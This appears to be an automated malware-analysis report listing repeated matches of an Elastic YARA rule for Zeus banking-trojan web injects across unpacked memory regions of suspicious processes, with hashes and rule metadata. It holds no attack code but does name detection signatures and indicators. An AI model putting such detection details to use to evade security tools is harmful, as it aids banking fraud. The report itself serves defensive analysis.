Source: 2.3.svchost.exe.886000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2560000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.30.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.28.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ea2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.45.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f380000.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.24f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.d30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.cd2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.29.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.52.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.45.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.UMwpXhA46R.exe.406400.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2af2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.cd2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.56.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2cd1c00.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.27a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.49.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1240000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
